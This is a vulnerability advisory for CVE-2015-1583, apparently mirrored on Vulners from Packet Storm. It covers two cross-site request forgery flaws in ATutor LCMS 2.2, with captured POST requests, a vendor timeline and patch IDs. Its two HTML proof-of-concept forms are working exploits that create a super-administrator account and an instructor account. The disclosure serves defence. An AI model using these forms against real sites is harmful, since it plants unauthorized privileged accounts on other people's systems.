Vulners
Lucene search
ATutor LCMS 2.2 Cross Site Request Forgery
šļøĀ 02 Mar 2015Ā 00:00:00Reported byĀ Edric TeoTypeĀ 
Ā packetstormšĀ packetstormsecurity.comšĀ 31Ā Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2015-1583 | 2 Mar 202019:23 | ā | circl |
 | Multiple Cross-Site Request Forgery Vulnerabilities in ATutor LCMS | 11 Mar 201500:00 | ā | cnvd |
 | CVE-2015-1583 | 2 Mar 202015:50 | ā | cve |
 | CVE-2015-1583 | 2 Mar 202015:50 | ā | cvelist |
 | EUVD-2015-1715 | 7 Oct 202500:30 | ā | euvd |
 | CVE-2015-1583 | 2 Mar 202016:15 | ā | nvd |
 | Cross site request forgery (csrf) | 2 Mar 202016:15 | ā | prion |
 | [CVE-2015-1583] ATutor LCMS - CSRF Vulnerability in Version 2.2 | 23 Mar 201500:00 | ā | securityvulns |
`[CVE-2015-1583] ATutor LCMS - CSRF Vulnerability in Version 2.2
----------------------------------------------------------------
Product Information:
Software: ATutor LCMS
Tested Version: 2.2, released 25.8.2014
Vulnerability Type: Cross-Site Request Forgery, CSRF (CWE-352)
Download link: http://atutor.ca/atutor/download.php
Description: ATutor is an Open Source Web-based Learning Content Management System (LCMS) designed with accessibility and adaptability in mind. (copied from http://www.atutor.ca/credits.php#whatatutor)
----------------------------------------------------------------
Issues:
1) CSRF in administrator creation page
2) CSRF in user creation page
----------------------------------------------------------------
Vulnerability description:
1) CSRF in administrator creation page
When an authenticated administrative user of ATutor LCMS is creating another administrator account, the following POST request is sent to the server:
POST /atutor-2.2/ATutor/mods/_core/users/admins/create.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 187
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: ATutorID=pr6jq1tlfr204nm60p5rtbj0u4; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _gat=1; _ga=GA1.1.621011711.1425057132
form_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94&password_error=&login=csrfadmin9&password=&confirm_password=&real_name=&[email protected]&priv_admin=1&submit=Save
By executing the following Proof-of-Concept, a new administrative user called "csrfadmin99" will be created with the password "1qazXSW@".
<html>
<body>
<form action="http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php" method="POST">
<input type="hidden" name="form_password_hidden" value="ef0f8b6ffb699f90933a3321b00ff6769e018b94" />
<input type="hidden" name="login" value="csrfadmin99" />
<input type="hidden" name="real_name" value="csrfadmin99" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="priv_admin" value="1" />
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2) CSRF in user creation page
When an authenticated administrative user of ATutor LCMS is creating an user, the following POST request is sent to the server:
POST /atutor-2.2/ATutor/mods/_core/users/create_user.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 429
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/create_user.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: ATutorID=0h3qqin6ndjmpt21m7f17i07l7; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _gat=1; _ga=GA1.1.621011711.1425057132
ml=&password_error=&form_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94®istration_token=19569b3551f19d60ddfbe4973d1733079f775568&login=csrfuser9&form_password1=&form_password2=&[email protected]&private_email=1&[email protected]&first_name=csrfuser9&second_name=&last_name=csrfuser9&id=&status=3&old_status=&year=&month=&day=&address=&postal=&city=&province=&country=&phone=&website=&submit=+Save+
By executing the following Proof-of-Concept, a new instructor user called "csrfuser99" will be created with the password "1qazXSW@".
<html>
<body>
<form action="http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/create_user.php" method="POST">
<input type="hidden" name="form_password_hidden" value="ef0f8b6ffb699f90933a3321b00ff6769e018b94" />
<input type="hidden" name="login" value="csrfuser99" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="private_email" value="1" />
<input type="hidden" name="email2" value="[email protected]" />
<input type="hidden" name="first_name" value="csrfuser99" />
<input type="hidden" name="last_name" value="csrfuser99" />
<input type="hidden" name="status" value="3" />
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
----------------------------------------------------------------
Impact:
1) An attacker is able to create an administrator account with super administrator privilege.
2) An attacker is able to create an user account with instructor privilege.
----------------------------------------------------------------
Solution:
Update using the in-built patcher, Patch ID 0009 and 0011.
----------------------------------------------------------------
Timeline:
Vulnerability found: 10.2.2015 & 28.2.2015
Vendor informed: 10.2.2015 & 28.2.2015
Response by vendor: 11.2.2015 & 28.2.2015
Fix by vendor 23.2.2015 & 28.2.2015
Public Advisory: 1.3.2015
----------------------------------------------------------------
Best regards,
Edric Teo
`
Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2015 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.00228